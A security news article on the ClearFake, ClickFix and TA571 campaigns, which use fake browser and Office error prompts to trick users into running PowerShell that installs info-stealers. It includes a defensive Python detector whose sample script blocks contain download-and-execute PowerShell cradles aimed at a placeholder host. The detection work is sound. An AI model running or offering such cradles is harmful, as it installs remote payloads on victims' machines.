Security experts have uncovered a novel malware operation that leverages deceptive error alerts from Google Chrome, Microsoft Word, and OneDrive to persuade users to execute malicious PowerShell scripts. This operation involves multiple threat groups, including those behind ClearFake, ClickFix, and TA571, all known for disseminating extensive spam emails that usually culminate in malware or ransomware attacks.
Advanced Social Engineering Techniques
The threat actors employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications. These alerts prompt users to copy a PowerShell “fix” command and paste it into a PowerShell prompt or the Run dialog. The script flushes the DNS cache, clears the clipboard, displays a decoy message, and downloads a second PowerShell script that performs anti-VM checks before fetching an info-stealer.
Proofpoint, a cybersecurity organization, notes that despite requiring significant user action, the attackers' social engineering methods are sophisticated enough to convince users they are resolving legitimate issues.
ClearFake Campaign
Since April, the ClearFake operation has been hijacking authentic websites with harmful HTML and JavaScript. Victims visiting these sites are prompted to install a “root certificate” to properly view the website. They are instructed to copy a PowerShell script and manually run it on their systems.
The script performs several actions, such as flushing the DNS cache, erasing clipboard data, showing a decoy message, and downloading a remote PowerShell script. This script runs additional commands, including fetching an AES-encrypted PowerShell script that extracts and runs files from a ZIP archive. The ZIP archive hosts various legitimate executable files that side-load a trojanized DLL, subsequently activating Lumma Stealer.
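The two descriptions above give defenders a usable signature: a single script block that flushes the DNS cache, touches the clipboard, shows a decoy message and pulls a remote script is far more specific than any one of those steps alone. The following triage routine is an added example, not code from the article or from Proofpoint; it scores constructed PowerShell Script Block Logging (Event ID 4104) bodies against that combination, and the indicator names, sample blocks and the PLACEHOLDER.invalid URL are this example's own assumptions.

```python
import re

# Constructed sample Script Block Logging (Event ID 4104) bodies, modelled on the
# behaviour the article describes; no real campaign code or domains are used.
SAMPLE_SCRIPT_BLOCKS = [
    "ipconfig /flushdns",                                   # routine admin use
    "Get-Content .\\notes.txt | Set-Clipboard",             # routine clipboard use
    'Clear-DnsClientCache; Set-Clipboard -Value " "; '      # the fake-fix chain
    'Write-Host "Applying fix, please wait..."; '
    'iex (New-Object Net.WebClient).DownloadString("http://PLACEHOLDER.invalid/s.ps1")',
    "Invoke-Expression (Invoke-WebRequest -Uri http://PLACEHOLDER.invalid/a.ps1).Content",
]

# One regex per building block of the chain; the names are this example's own.
INDICATORS = {
    "dns_flush": re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I),
    "clipboard": re.compile(r"Set-Clipboard|Clipboard\]::Clear", re.I),
    "decoy_message": re.compile(r"Write-Host|MessageBox\]::Show", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "remote_exec": re.compile(r"\biex\b|Invoke-Expression", re.I),
}


def indicators(script_block: str) -> set[str]:
    """Return the names of every indicator present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_block)}


def verdict(found: set[str]) -> str:
    """Rank a block: the full chain is far more specific than any single step."""
    if {"dns_flush", "clipboard", "download"} <= found:
        return "fake-fix-chain"        # the combination the article describes
    if {"download", "remote_exec"} <= found:
        return "download-cradle"       # worth a look, but common in admin tooling too
    return "info"


def triage(blocks: list[str]) -> list[tuple[int, str, set[str]]]:
    """Score every block; only the first two verdict tiers are worth alerting on."""
    results = []
    for i, block in enumerate(blocks):
        found = indicators(block)
        results.append((i, verdict(found), found))
    return results


if __name__ == "__main__":
    for idx, v, found in triage(SAMPLE_SCRIPT_BLOCKS):
        if v != "info":
            print(f"block {idx}: {v} ({', '.join(sorted(found))})")
```

Script Block Logging must be enabled for 4104 events to exist; the Run-dialog variant also leaves the pasted command in the user's RunMRU history, which is a second place to look.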
ClickFix Campaign
Mid-April saw the ClickFix operation using compromised websites to display an iframe with a bogus alert about a browser update problem. Users were directed to open “Windows PowerShell (Admin)” and paste a provided code, executing a remote PowerShell script that fetched and ran Vidar Stealer, malware that targets personal information and cryptocurrency wallet data on the compromised system. The domain serving the payload was taken offline shortly after discovery, disrupting the campaign temporarily.
TA571 Campaign
TA571 was first observed utilizing this approach on 1 March 2024, sending over 100,000 messages to multiple organizations. The campaign used HTML attachments mimicking Microsoft Word documents, with error prompts urging users to execute PowerShell commands, leading to the installation of malware such as DarkGate and Matanbuchus.
On 27 May 2024, TA571 used HTML attachments mimicking OneDrive-hosted documents, directing users to execute PowerShell scripts, thereby installing DarkGate malware. The group has also been seen using the Run dialog instead of the PowerShell terminal, guiding users to run malicious scripts resulting in infections with DarkGate and NetSupport RAT.